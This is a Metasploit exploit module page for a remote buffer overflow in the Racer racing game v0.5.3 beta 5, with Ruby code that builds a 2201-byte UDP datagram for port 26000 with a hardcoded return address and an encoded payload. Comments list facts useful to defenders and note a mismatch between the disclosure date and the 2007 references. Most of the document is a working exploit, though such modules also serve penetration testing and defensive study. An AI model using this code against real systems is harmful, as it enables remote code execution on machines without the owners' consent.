Racer v0.5.3 Beta 5 Buffer Overflow

2009-05-03T11:10:37
ID MSF:EXPLOIT/WINDOWS/GAMES/RACER_503BETA5
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24

Description

This module exploits the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

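# Exploit module for the Racer v0.5.3 beta 5 UDP buffer overflow (CVE-2007-4370).
#
# Defender-relevant facts, all taken from the module body below:
# - the only network artifact is a single UDP datagram to port 26000 (RPORT
#   default), fixed at 2201 bytes: 1001 bytes of alphanumeric filler, a
#   4-byte little-endian return address, then the encoded payload padded
#   with alphanumeric text to 1196 bytes;
# - the payload is limited to 1000 bytes ('Space') and must avoid
#   "\x5c" and "\x00" ('BadChars'), so the datagram is almost entirely
#   printable alphanumeric characters apart from the 4-byte address;
# - both the game client and server listen on that port, so a client
#   machine is exposed as much as a server.
# Hosts running the affected versions should not expose UDP 26000 to
# untrusted networks; versions after v0.5.3 beta 5 are outside the stated
# affected range.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp

  # Module metadata. The option table is unchanged; only RPORT (26000) is
  # registered beyond the UDP mixin's defaults.
  #
  # NOTE(review): the CVE (2007-4370), EDB (4283) and BID (25297) references
  # all point at 2007, while 'DisclosureDate' says 2008 -- confirm the year.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Racer v0.5.3 Beta 5 Buffer Overflow',
      'Description'    => %q{
          This module exploits the Racer Car and Racing Simulator game
        versions v0.5.3 beta 5 and earlier. Both the client and server listen
        on UDP port 26000. By sending an overly long buffer we are able to
        execute arbitrary code remotely.
      },
      'Author'         => [ 'Trancek <trancek[at]yashira.org>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-4370' ],
          [ 'OSVDB', '39601' ],
          [ 'EDB', '4283' ],
          [ 'BID', '25297' ],
        ],
      'Payload'        =>
        {
          # 1000-byte ceiling keeps the padding computed in #exploit non-negative.
          'Space'    => 1000,
          'BadChars' => "\x5c\x00",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
        },
      'DefaultOptions' =>
        {
          'AllowWin32SEH' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested ok aushack 20090503
          [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp
          [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ],
          [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ],
        ],
      'DisclosureDate' => 'Aug 10 2008',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(26000)
      ])
  end

  # Builds the oversized datagram and sends it once over UDP.
  #
  # Datagram layout (always 2201 bytes):
  #   [1001 bytes alphanumeric][target.ret as 'V'][payload.encoded]
  #   [alphanumeric pad to 1196 bytes after the return address]
  #
  # Fix relative to the earlier revision: the socket opened by connect_udp
  # was only released on the success path, so an exception from put or from
  # payload generation leaked it; disconnect_udp now runs from `ensure`.
  # payload.encoded is also read once rather than twice, so the bytes sent
  # and the bytes measured for padding are guaranteed to be the same string.
  def exploit
    connect_udp
    begin
      encoded = payload.encoded

      buf = Rex::Text.rand_text_alphanumeric(1001)
      buf << [target.ret].pack('V')
      buf << encoded
      # 'Space' => 1000 keeps this length >= 196.
      buf << Rex::Text.rand_text_alphanumeric(1196 - encoded.length)

      udp_sock.put(buf)

      handler
    ensure
      disconnect_udp
    end
  end
end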